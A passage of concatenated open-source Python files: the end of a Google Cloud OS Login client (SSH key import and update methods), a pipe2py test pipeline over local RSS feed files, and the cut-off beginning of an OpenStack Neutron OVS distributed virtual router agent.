metadata: Sequence[Tuple[str, str]] = (),
) -> oslogin.ImportSshPublicKeyResponse:
r"""Adds an SSH public key and returns the profile
information. Default POSIX account information is set
when no username and UID exist as part of the login
profile.
Args:
request (google.cloud.oslogin_v1beta.types.ImportSshPublicKeyRequest):
The request object. A request message for importing an
SSH public key.
parent (str):
The unique ID for the user in format ``users/{user}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
ssh_public_key (google.cloud.oslogin.common.common_pb2.SshPublicKey):
Required. The SSH public key and
expiration time.
This corresponds to the ``ssh_public_key`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
project_id (str):
The project ID of the Google Cloud
Platform project.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.oslogin_v1beta.types.ImportSshPublicKeyResponse:
A response message for importing an
SSH public key.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, ssh_public_key, project_id])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a oslogin.ImportSshPublicKeyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.ImportSshPublicKeyRequest):
request = oslogin.ImportSshPublicKeyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if ssh_public_key is not None:
request.ssh_public_key = ssh_public_key
if project_id is not None:
request.project_id = project_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.import_ssh_public_key]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("parent", request.parent),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def update_ssh_public_key(self,
request: oslogin.UpdateSshPublicKeyRequest = None,
*,
name: str = None,
ssh_public_key: common_pb2.SshPublicKey = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> common_pb2.SshPublicKey:
r"""Updates an SSH public key and returns the profile
information. This method supports patch semantics.
Args:
request (google.cloud.oslogin_v1beta.types.UpdateSshPublicKeyRequest):
The request object. A request message for updating an
SSH public key.
name (str):
Required. The fingerprint of the public key to update.
Public keys are identified by their SHA-256 fingerprint.
The fingerprint of the public key is in format
``users/{user}/sshPublicKeys/{fingerprint}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
ssh_public_key (google.cloud.oslogin.common.common_pb2.SshPublicKey):
Required. The SSH public key and
expiration time.
This corresponds to the ``ssh_public_key`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Mask to control which fields get
updated. Updates all if not present.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.oslogin.common.common_pb2.SshPublicKey:
The SSH public key information
associated with a Google account.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name, ssh_public_key, update_mask])
if request is not None and has_flattened_params:
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a oslogin.UpdateSshPublicKeyRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, oslogin.UpdateSshPublicKeyRequest):
request = oslogin.UpdateSshPublicKeyRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
if ssh_public_key is not None:
request.ssh_public_key = ssh_public_key
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_ssh_public_key]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
("name", request.name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-oslogin",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = (
"OsLoginServiceClient",
)
|
satishgoda/pipe2py
|
refs/heads/master
|
tests/pypipelines/pipe_404411a8d22104920f3fc1f428f33642.py
|
6
|
# Pipe pipe_404411a8d22104920f3fc1f428f33642 generated by pipe2py
from pipe2py import Context
from pipe2py.modules.pipeforever import pipe_forever
from pipe2py.modules.pipefetch import pipe_fetch
from pipe2py.modules.pipefetch import pipe_fetch
from pipe2py.modules.pipecount import pipe_count
from pipe2py.modules.pipetruncate import pipe_truncate
from pipe2py.modules.pipeoutput import pipe_output
def pipe_404411a8d22104920f3fc1f428f33642(context=None, _INPUT=None, conf=None, **kwargs):
# todo: insert pipeline description here
conf = conf or {}
if context and context.describe_input:
return []
if context and context.describe_dependencies:
return [u'pipecount', u'pipefetch', u'pipeoutput', u'pipetruncate']
forever = pipe_forever()
sw_502 = pipe_fetch(
context, forever, conf={'URL': {'type': 'url', 'value': 'file://data/feeds.delicious.com_v2_rss_popular?count=15.xml'}})
sw_561 = pipe_fetch(
context, forever, conf={'URL': {'type': 'url', 'value': 'file://data/feeds.delicious.com_v2_rss_popular?count=3.xml'}})
sw_569 = pipe_count(
context, sw_561, conf={})
sw_583 = pipe_truncate(
context, sw_502, count=sw_569, conf={'count': {'terminal': 'count', 'type': 'number'}})
_OUTPUT = pipe_output(
context, sw_583, conf={})
return _OUTPUT
if __name__ == "__main__":
pipeline = pipe_404411a8d22104920f3fc1f428f33642(Context())
for i in pipeline:
print i
|
rdo-management/neutron
|
refs/heads/mgt-master
|
neutron/plugins/openvswitch/agent/ovs_dvr_neutron_agent.py
|
2
|
# Copyright 2014, Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import oslo_messaging
from oslo_utils import excutils
from neutron.api.rpc.handlers import dvr_rpc
from neutron.common import constants as n_const
from neutron.common import utils as n_utils
from neutron.i18n import _LE, _LI, _LW
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants as p_const
from neutron.plugins.openvswitch.common import constants
LOG = logging.getLogger(__name__)
# A class to represent a DVR-hosted subnet including vif_ports resident on
# that subnet
class LocalDVRSubnetMapping(object):
def __init__(self, subnet, csnat_ofport=constants.OFPORT_INVALID):
# set of commpute ports on on this dvr subnet
self.compute_ports = {}
self.subnet = subnet
self.csnat_ofport = csnat_ofport
self.dvr_owned = False
def __str__(self):
return ("subnet = %s compute_ports = %s csnat_port = %s"
" is_dvr_owned = %s" %
(self.subnet, self.get_compute_ofports(),
self.get_csnat_ofport(), self.is_dvr_owned()))
def get_subnet_info(self):
return self.subnet
def set_dvr_owned(self, owned):
self.dvr_owned = owned
def is_dvr_owned(self):
return self.dvr_owned
def add_compute_ofport(self, vif_id, ofport):
self.compute_ports[vif_id] = ofport
def remove_compute_ofport(self, vif_id):
self.compute_ports.pop(vif_id, 0)
def remove_all_compute_ofports(self):
self.compute_ports.clear()
def get_compute_ofports(self):
return self.compute_ports
def set_csnat_ofport(self, ofport):
self.csnat_ofport = ofport
def get_csnat_ofport(self):
return self.csnat_ofport
class OVSPort(object):
def __init__(self, id, ofport, mac, device_owner):
self.id = id
self.mac = mac
self.ofport = ofport
self.subnets = set()
self.device_owner = device_owner
def __str__(self):
return ("OVSPort: id = %s, ofport = %s, mac = %s,"
"device_owner = %s, subnets = %s" %
(self.id, self.ofport, self.mac,
self.device_owner, self.subnets))
def add_subnet(self, subnet_id):
self.subnets.add(subnet_id)
def remove_subnet(self, subnet_id):
self.subnets.remove(subnet_id)
def remove_all_subnets(self):
self.subnets.clear()
def get_subnets(self):
return self.subnets
def get_device_owner(self):
return self.device_owner
def get_mac(self):
return self.mac
def get_ofport(self):
return self.ofport
class OVSDVRNeutronAgent(dvr_rpc.DVRAgentRpcApiMixin):
'''
Implements OVS-based DVR(Distributed Virtual Router), for overlay networks.
'''
# history
# 1.0 Initial version
def __init__(self, context, plugin_rpc, integ_br, tun_br,
bridge_mappings, phys_brs, int_ofports, phys_ofports,
patch_int_ofport=constants.OFPORT_INVALID,
patch_tun_ofport=constants.OFPORT_INVALID,
host=None, enable_tunneling=False,
enable_distributed_routing=False):
self.context = context
self.plugin_rpc = plugin_rpc
self.host = host
self.enable_tunneling = enable_tunneling
self.enable_distributed_routing = enable_distributed_routing
self.bridge_mappings = bridge_mappings
self.phys_brs = phys_brs
self.int_ofports = int_ofports
self.phys_ofports = phys_ofports
self.reset_ovs_parameters(integ_br, tun_br,
patch_int_ofport, patch_tun_ofport)
self.reset_dvr_parameters()
self.dvr_mac_address = None
if self.enable_distributed_routing:
self.get_dvr_mac_address()
def reset_ovs_parameters(self, integ_br, tun_br,
patch_int_ofport, patch_tun_ofport):
'''Reset the openvswitch parameters'''
self.int_br = integ_br
self.tun_br = tun_br
self.patch_int_ofport = patch_int_ofport
self.patch_tun_ofport = patch_tun_ofport
def reset_dvr_parameters(self):
'''Reset the DVR parameters'''
self.local_dvr_map = {}
self.local_csnat_map = {}
self.local_ports = {}
self.registered_dvr_macs = set()
def get_dvr_mac_address(self):
try:
self.get_dvr_mac_address_with_retry()
except oslo_messaging.RemoteError as e:
LOG.warning(_LW('L2 agent could not get DVR MAC address at '
'startup due to RPC error. It happens when the '
'server does not support this RPC API. Detailed '
'message: %s'), e)
except oslo_messaging.MessagingTimeout:
LOG.error(_LE('DVR: Failed to obtain a valid local '
'DVR MAC address - L2 Agent operating '
'in Non-DVR Mode'))
if not self.in_distributed_mode():
# switch all traffic using L2 learning
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=1, actions="normal")
def get_dvr_mac_address_with_retry(self):
# Get the local DVR MAC Address from the Neutron Server.
# This is the first place where we contact the server on startup
# so retry in case it's not ready to respond
for retry_count in reversed(range(5)):
try:
details = self.plugin_rpc.get_dvr_mac_address_by_host(
self.context, self.host)
except oslo_messaging.MessagingTimeout as e:
with excutils.save_and_reraise_exception() as ctx:
if retry_count > 0:
ctx.reraise = False
LOG.warning(_LW('L2 agent could not get DVR MAC '
'address from server. Retrying. '
'Detailed message: %s'), e)
else:
LOG.debug("L2 Agent DVR: Received response for "
"get_dvr_mac_address_by_host() from "
"plugin: %r", details)
self.dvr_mac_address = details['mac_address']
return
def setup_dvr_flows_on_integ_br(self):
'''Setup up initial dvr flows into br-int'''
if not self.in_distributed_mode():
return
LOG.info(_LI("L2 Agent operating in DVR Mode with MAC %s"),
self.dvr_mac_address)
# Remove existing flows in integration bridge
self.int_br.remove_all_flows()
# Add a canary flow to int_br to track OVS restarts
self.int_br.add_flow(table=constants.CANARY_TABLE, priority=0,
actions="drop")
# Insert 'drop' action as the default for Table DVR_TO_SRC_MAC
self.int_br.add_flow(table=constants.DVR_TO_SRC_MAC,
priority=1,
actions="drop")
self.int_br.add_flow(table=constants.DVR_TO_SRC_MAC_VLAN,
priority=1,
actions="drop")
# Insert 'normal' action as the default for Table LOCAL_SWITCHING
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=1,
actions="normal")
for physical_network in self.bridge_mappings:
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=2,
in_port=self.int_ofports[physical_network],
actions="drop")
def setup_dvr_flows_on_tun_br(self):
'''Setup up initial dvr flows into br-tun'''
if not self.enable_tunneling or not self.in_distributed_mode():
return
self.tun_br.add_flow(priority=1,
in_port=self.patch_int_ofport,
actions="resubmit(,%s)" %
constants.DVR_PROCESS)
# table-miss should be sent to learning table
self.tun_br.add_flow(table=constants.DVR_NOT_LEARN,
priority=0,
actions="resubmit(,%s)" %
constants.LEARN_FROM_TUN)
self.tun_br.add_flow(table=constants.DVR_PROCESS,
priority=0,
actions="resubmit(,%s)" %
constants.PATCH_LV_TO_TUN)
def setup_dvr_flows_on_phys_br(self):
'''Setup up initial dvr flows into br-phys'''
if not self.in_distributed_mode():
return
for physical_network in self.bridge_mappings:
self.phys_brs[physical_network].add_flow(priority=2,
in_port=self.phys_ofports[physical_network],
actions="resubmit(,%s)" %
constants.DVR_PROCESS_VLAN)
self.phys_brs[physical_network].add_flow(priority=1,
actions="resubmit(,%s)" %
constants.DVR_NOT_LEARN_VLAN)
self.phys_brs[physical_network].add_flow(
table=constants.DVR_PROCESS_VLAN,
priority=0,
actions="resubmit(,%s)" %
constants.LOCAL_VLAN_TRANSLATION)
self.phys_brs[physical_network].add_flow(
table=constants.LOCAL_VLAN_TRANSLATION,
priority=2,
in_port=self.phys_ofports[physical_network],
actions="drop")
self.phys_brs[physical_network].add_flow(
table=constants.DVR_NOT_LEARN_VLAN,
priority=1,
actions="NORMAL")
def setup_dvr_mac_flows_on_all_brs(self):
if not self.in_distributed_mode():
LOG.debug("Not in distributed mode, ignoring invocation "
"of get_dvr_mac_address_list() ")
return
dvr_macs = self.plugin_rpc.get_dvr_mac_address_list(self.context)
LOG.debug("L2 Agent DVR: Received these MACs: %r", dvr_macs)
for mac in dvr_macs:
if mac['mac_address'] == self.dvr_mac_address:
continue
for physical_network in self.bridge_mappings:
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=4,
in_port=self.int_ofports[physical_network],
dl_src=mac['mac_address'],
actions="resubmit(,%s)" %
constants.DVR_TO_SRC_MAC_VLAN)
self.phys_brs[physical_network].add_flow(
table=constants.DVR_NOT_LEARN_VLAN,
priority=2,
dl_src=mac['mac_address'],
actions="output:%s" %
self.phys_ofports[physical_network])
if self.enable_tunneling:
# Table 0 (default) will now sort DVR traffic from other
# traffic depending on in_port
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=2,
in_port=self.patch_tun_ofport,
dl_src=mac['mac_address'],
actions="resubmit(,%s)" %
constants.DVR_TO_SRC_MAC)
# Table DVR_NOT_LEARN ensures unique dvr macs in the cloud
# are not learnt, as they may
# result in flow explosions
self.tun_br.add_flow(table=constants.DVR_NOT_LEARN,
priority=1,
dl_src=mac['mac_address'],
actions="output:%s" %
self.patch_int_ofport)
self.registered_dvr_macs.add(mac['mac_address'])
def dvr_mac_address_update(self, dvr_macs):
if not self.dvr_mac_address:
LOG.debug("Self mac unknown, ignoring this "
"dvr_mac_address_update() ")
return
dvr_host_macs = set()
for entry in dvr_macs:
if entry['mac_address'] == self.dvr_mac_address:
continue
dvr_host_macs.add(entry['mac_address'])
if dvr_host_macs == self.registered_dvr_macs:
LOG.debug("DVR Mac address already up to date")
return
dvr_macs_added = dvr_host_macs - self.registered_dvr_macs
dvr_macs_removed = self.registered_dvr_macs - dvr_host_macs
for oldmac in dvr_macs_removed:
for physical_network in self.bridge_mappings:
self.int_br.delete_flows(table=constants.LOCAL_SWITCHING,
in_port=self.int_ofports[physical_network],
dl_src=oldmac)
self.phys_brs[physical_network].delete_flows(
table=constants.DVR_NOT_LEARN_VLAN,
dl_src=oldmac)
if self.enable_tunneling:
self.int_br.delete_flows(table=constants.LOCAL_SWITCHING,
in_port=self.patch_tun_ofport,
dl_src=oldmac)
self.tun_br.delete_flows(table=constants.DVR_NOT_LEARN,
dl_src=oldmac)
LOG.debug("Removed DVR MAC flow for %s", oldmac)
self.registered_dvr_macs.remove(oldmac)
for newmac in dvr_macs_added:
for physical_network in self.bridge_mappings:
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=4,
in_port=self.int_ofports[physical_network],
dl_src=newmac,
actions="resubmit(,%s)" %
constants.DVR_TO_SRC_MAC_VLAN)
self.phys_brs[physical_network].add_flow(
table=constants.DVR_NOT_LEARN_VLAN,
priority=2,
dl_src=newmac,
actions="output:%s" %
self.phys_ofports[physical_network])
if self.enable_tunneling:
self.int_br.add_flow(table=constants.LOCAL_SWITCHING,
priority=2,
in_port=self.patch_tun_ofport,
dl_src=newmac,
actions="resubmit(,%s)" %
constants.DVR_TO_SRC_MAC)
self.tun_br.add_flow(table=constants.DVR_NOT_LEARN,
priority=1,
dl_src=newmac,
actions="output:%s" %
self.patch_int_ofport)
LOG.debug("Added DVR MAC flow for %s", newmac)
self.registered_dvr_macs.add(newmac)
def in_distributed_mode(self):
return self.dvr_mac_address is not None
def is_dvr_router_interface(self, device_owner):
return device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE
def process_tunneled_network(self, network_type, lvid, segmentation_id):
if self.in_distributed_mode():
table_id = constants.DVR_NOT_LEARN
else:
table_id = constants.LEARN_FROM_TUN
self.tun_br.add_flow(table=constants.TUN_TABLE[network_type],
priority=1,
tun_id=segmentation_id,
actions="mod_vlan_vid:%s,"
"resubmit(,%s)" %
(lvid, table_id))
def _bind_distributed_router_interface_port(self, port, lvm,
fixed_ips, device_owner):
# since router port must have only one fixed IP, directly
# use fixed_ips[0]
subnet_uuid = fixed_ips[0]['subnet_id']
csnat_ofport = constants.OFPORT_INVALID
ldm = None
if subnet_uuid in self.local_dvr_map:
ldm = self.local_dvr_map[subnet_uuid]
csnat_ofport = ldm.get_csnat_ofport()
if csnat_ofport == constants.OFPORT_INVALID:
LOG.error(_LE("DVR: Duplicate DVR router interface detected "
"for subnet %s"), subnet_uuid)
return
else:
# set up LocalDVRSubnetMapping available for this subnet
subnet_info = self.plugin_rpc.get_subnet_for_dvr(self.context,
subnet_uuid)
if not subnet_info:
LOG.error(_LE("DVR: Unable to retrieve subnet information "
"for subnet_id %s"), subnet_uuid)
return
LOG.debug("get_subnet_for_dvr for subnet %(uuid)s "
"returned with %(info)s",
{"uuid": subnet_uuid, "info": subnet_info})
ldm = LocalDVRSubnetMapping(subnet_info)
self.local_dvr_map[subnet_uuid] = ldm
# DVR takes over
ldm.set_dvr_owned(True)
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
subnet_info = ldm.get_subnet_info()
ip_version = subnet_info['ip_version']
local_compute_ports = (
self.plugin_rpc.get_ports_on_host_by_subnet(
self.context, self.host, subnet_uuid))
LOG.debug("DVR: List of ports received from "
"get_ports_on_host_by_subnet %s",
local_compute_ports)
for prt in local_compute_ports:
vif = self.int_br.get_vif_port_by_id(prt['id'])
if not vif:
continue
ldm.add_compute_ofport(vif.vif_id, vif.ofport)
if vif.vif_id in self.local_ports:
# ensure if a compute port is already on
# a different dvr routed subnet
# if yes, queue this subnet to that port
comp_ovsport = self.local_ports[vif.vif_id]
comp_ovsport.add_subnet(subnet_uuid)
else:
# the compute port is discovered first here that its on
# a dvr routed subnet queue this subnet to that port
comp_ovsport = OVSPort(vif.vif_id, vif.ofport,
vif.vif_mac, prt['device_owner'])
comp_ovsport.add_subnet(subnet_uuid)
self.local_ports[vif.vif_id] = comp_ovsport
# create rule for just this vm port
self.int_br.add_flow(table=table_id,
priority=4,
dl_vlan=vlan_to_use,
dl_dst=comp_ovsport.get_mac(),
actions="strip_vlan,mod_dl_src:%s,"
"output:%s" %
(subnet_info['gateway_mac'],
comp_ovsport.get_ofport()))
if lvm.network_type == p_const.TYPE_VLAN:
args = {'table': constants.DVR_PROCESS_VLAN,
'priority': 3,
'dl_vlan': lvm.vlan,
'actions': "drop"}
if ip_version == 4:
args['proto'] = 'arp'
args['nw_dst'] = subnet_info['gateway_ip']
else:
args['proto'] = 'icmp6'
args['icmp_type'] = n_const.ICMPV6_TYPE_RA
args['dl_src'] = subnet_info['gateway_mac']
# TODO(vivek) remove the IPv6 related add_flow once SNAT is not
# used for IPv6 DVR.
self.phys_brs[lvm.physical_network].add_flow(**args)
self.phys_brs[lvm.physical_network].add_flow(
table=constants.DVR_PROCESS_VLAN,
priority=2,
dl_vlan=lvm.vlan,
dl_dst=port.vif_mac,
actions="drop")
self.phys_brs[lvm.physical_network].add_flow(
table=constants.DVR_PROCESS_VLAN,
priority=1,
dl_vlan=lvm.vlan,
dl_src=port.vif_mac,
actions="mod_dl_src:%s,resubmit(,%s)" %
(self.dvr_mac_address, constants.LOCAL_VLAN_TRANSLATION))
if lvm.network_type in constants.TUNNEL_NETWORK_TYPES:
args = {'table': constants.DVR_PROCESS,
'priority': 3,
'dl_vlan': lvm.vlan,
'actions': "drop"}
if ip_version == 4:
args['proto'] = 'arp'
args['nw_dst'] = subnet_info['gateway_ip']
else:
args['proto'] = 'icmp6'
args['icmp_type'] = n_const.ICMPV6_TYPE_RA
args['dl_src'] = subnet_info['gateway_mac']
# TODO(vivek) remove the IPv6 related add_flow once SNAT is not
# used for IPv6 DVR.
self.tun_br.add_flow(**args)
self.tun_br.add_flow(table=constants.DVR_PROCESS,
priority=2,
dl_vlan=lvm.vlan,
dl_dst=port.vif_mac,
actions="drop")
self.tun_br.add_flow(table=constants.DVR_PROCESS,
priority=1,
dl_vlan=lvm.vlan,
dl_src=port.vif_mac,
actions="mod_dl_src:%s,resubmit(,%s)" %
(self.dvr_mac_address,
constants.PATCH_LV_TO_TUN))
# the dvr router interface is itself a port, so capture it
# queue this subnet to that port. A subnet appears only once as
# a router interface on any given router
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
def _bind_port_on_dvr_subnet(self, port, lvm, fixed_ips,
device_owner):
# Handle new compute port added use-case
subnet_uuid = None
for ips in fixed_ips:
if ips['subnet_id'] not in self.local_dvr_map:
continue
subnet_uuid = ips['subnet_id']
ldm = self.local_dvr_map[subnet_uuid]
if not ldm.is_dvr_owned():
# well this is CSNAT stuff, let dvr come in
# and do plumbing for this vm later
continue
# This confirms that this compute port belongs
# to a dvr hosted subnet.
# Accommodate this VM Port into the existing rule in
# the integration bridge
LOG.debug("DVR: Plumbing compute port %s", port.vif_id)
subnet_info = ldm.get_subnet_info()
ldm.add_compute_ofport(port.vif_id, port.ofport)
if port.vif_id in self.local_ports:
# ensure if a compute port is already on a different
# dvr routed subnet
# if yes, queue this subnet to that port
ovsport = self.local_ports[port.vif_id]
ovsport.add_subnet(subnet_uuid)
else:
# the compute port is discovered first here that its
# on a dvr routed subnet, queue this subnet to that port
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
# create a rule for this vm port
self.int_br.add_flow(table=table_id,
priority=4,
dl_vlan=vlan_to_use,
dl_dst=ovsport.get_mac(),
actions="strip_vlan,mod_dl_src:%s,"
"output:%s" %
(subnet_info['gateway_mac'],
ovsport.get_ofport()))
def _bind_centralized_snat_port_on_dvr_subnet(self, port, lvm,
fixed_ips, device_owner):
if port.vif_id in self.local_ports:
# throw an error if CSNAT port is already on a different
# dvr routed subnet
ovsport = self.local_ports[port.vif_id]
subs = list(ovsport.get_subnets())
LOG.error(_LE("Centralized-SNAT port %s already seen on "),
port.vif_id)
LOG.error(_LE("a different subnet %s"), subs[0])
return
# since centralized-SNAT (CSNAT) port must have only one fixed
# IP, directly use fixed_ips[0]
subnet_uuid = fixed_ips[0]['subnet_id']
ldm = None
subnet_info = None
if subnet_uuid not in self.local_dvr_map:
# no csnat ports seen on this subnet - create csnat state
# for this subnet
subnet_info = self.plugin_rpc.get_subnet_for_dvr(self.context,
subnet_uuid)
ldm = LocalDVRSubnetMapping(subnet_info, port.ofport)
self.local_dvr_map[subnet_uuid] = ldm
else:
ldm = self.local_dvr_map[subnet_uuid]
subnet_info = ldm.get_subnet_info()
# Store csnat OF Port in the existing DVRSubnetMap
ldm.set_csnat_ofport(port.ofport)
# create ovsPort footprint for csnat port
ovsport = OVSPort(port.vif_id, port.ofport,
port.vif_mac, device_owner)
ovsport.add_subnet(subnet_uuid)
self.local_ports[port.vif_id] = ovsport
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
self.int_br.add_flow(table=table_id,
priority=4,
dl_vlan=vlan_to_use,
dl_dst=ovsport.get_mac(),
actions="strip_vlan,mod_dl_src:%s,"
" output:%s" %
(subnet_info['gateway_mac'],
ovsport.get_ofport()))
def bind_port_to_dvr(self, port, local_vlan_map,
fixed_ips, device_owner):
if not self.in_distributed_mode():
return
if local_vlan_map.network_type not in (constants.TUNNEL_NETWORK_TYPES
+ [p_const.TYPE_VLAN]):
LOG.debug("DVR: Port %s is with network_type %s not supported"
" for dvr plumbing" % (port.vif_id,
local_vlan_map.network_type))
return
if device_owner == n_const.DEVICE_OWNER_DVR_INTERFACE:
self._bind_distributed_router_interface_port(port,
local_vlan_map,
fixed_ips,
device_owner)
if device_owner and n_utils.is_dvr_serviced(device_owner):
self._bind_port_on_dvr_subnet(port, local_vlan_map,
fixed_ips,
device_owner)
if device_owner == n_const.DEVICE_OWNER_ROUTER_SNAT:
self._bind_centralized_snat_port_on_dvr_subnet(port,
local_vlan_map,
fixed_ips,
device_owner)
def _unbind_distributed_router_interface_port(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# removal of distributed router interface
subnet_ids = ovsport.get_subnets()
subnet_set = set(subnet_ids)
network_type = lvm.network_type
physical_network = lvm.physical_network
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
# ensure we process for all the subnets laid on this removed port
for sub_uuid in subnet_set:
if sub_uuid not in self.local_dvr_map:
continue
ldm = self.local_dvr_map[sub_uuid]
subnet_info = ldm.get_subnet_info()
ip_version = subnet_info['ip_version']
# DVR is no more owner
ldm.set_dvr_owned(False)
# remove all vm rules for this dvr subnet
# clear of compute_ports altogether
compute_ports = ldm.get_compute_ofports()
for vif_id in compute_ports:
comp_port = self.local_ports[vif_id]
self.int_br.delete_flows(table=table_id,
dl_vlan=vlan_to_use,
dl_dst=comp_port.get_mac())
ldm.remove_all_compute_ofports()
if ldm.get_csnat_ofport() == constants.OFPORT_INVALID:
# if there is no csnat port for this subnet, remove
# this subnet from local_dvr_map, as no dvr (or) csnat
# ports available on this agent anymore
self.local_dvr_map.pop(sub_uuid, None)
if network_type == p_const.TYPE_VLAN:
args = {'table': constants.DVR_PROCESS_VLAN,
'dl_vlan': lvm.vlan}
if ip_version == 4:
args['proto'] = 'arp'
args['nw_dst'] = subnet_info['gateway_ip']
else:
args['proto'] = 'icmp6'
args['icmp_type'] = n_const.ICMPV6_TYPE_RA
args['dl_src'] = subnet_info['gateway_mac']
self.phys_br[physical_network].delete_flows(**args)
if network_type in constants.TUNNEL_NETWORK_TYPES:
args = {'table': constants.DVR_PROCESS,
'dl_vlan': lvm.vlan}
if ip_version == 4:
args['proto'] = 'arp'
args['nw_dst'] = subnet_info['gateway_ip']
else:
args['proto'] = 'icmp6'
args['icmp_type'] = n_const.ICMPV6_TYPE_RA
args['dl_src'] = subnet_info['gateway_mac']
self.tun_br.delete_flows(**args)
ovsport.remove_subnet(sub_uuid)
if lvm.network_type == p_const.TYPE_VLAN:
self.phys_br[physical_network].delete_flows(
table=constants.DVR_PROCESS_VLAN,
dl_vlan=lvm.vlan,
dl_dst=port.vif_mac)
self.phys_br[physical_network].delete_flows(
table=constants.DVR_PROCESS_VLAN,
dl_vlan=lvm.vlan,
dl_src=port.vif_mac)
if lvm.network_type in constants.TUNNEL_NETWORK_TYPES:
self.tun_br.delete_flows(table=constants.DVR_PROCESS,
dl_vlan=lvm.vlan,
dl_dst=port.vif_mac)
self.tun_br.delete_flows(table=constants.DVR_PROCESS,
dl_vlan=lvm.vlan,
dl_src=port.vif_mac)
# release port state
self.local_ports.pop(port.vif_id, None)
def _unbind_port_on_dvr_subnet(self, port, lvm):
ovsport = self.local_ports[port.vif_id]
# This confirms that this compute port being removed belonged
# to a dvr hosted subnet.
LOG.debug("DVR: Removing plumbing for compute port %s", port)
subnet_ids = ovsport.get_subnets()
# ensure we process for all the subnets laid on this port
for sub_uuid in subnet_ids:
if sub_uuid not in self.local_dvr_map:
continue
ldm = self.local_dvr_map[sub_uuid]
ldm.remove_compute_ofport(port.vif_id)
table_id = constants.DVR_TO_SRC_MAC
vlan_to_use = lvm.vlan
if lvm.network_type == p_const.TYPE_VLAN:
table_id = constants.DVR_TO_SRC_MAC_VLAN
vlan_to_use = lvm.segmentation_id
# first remove this vm port rule
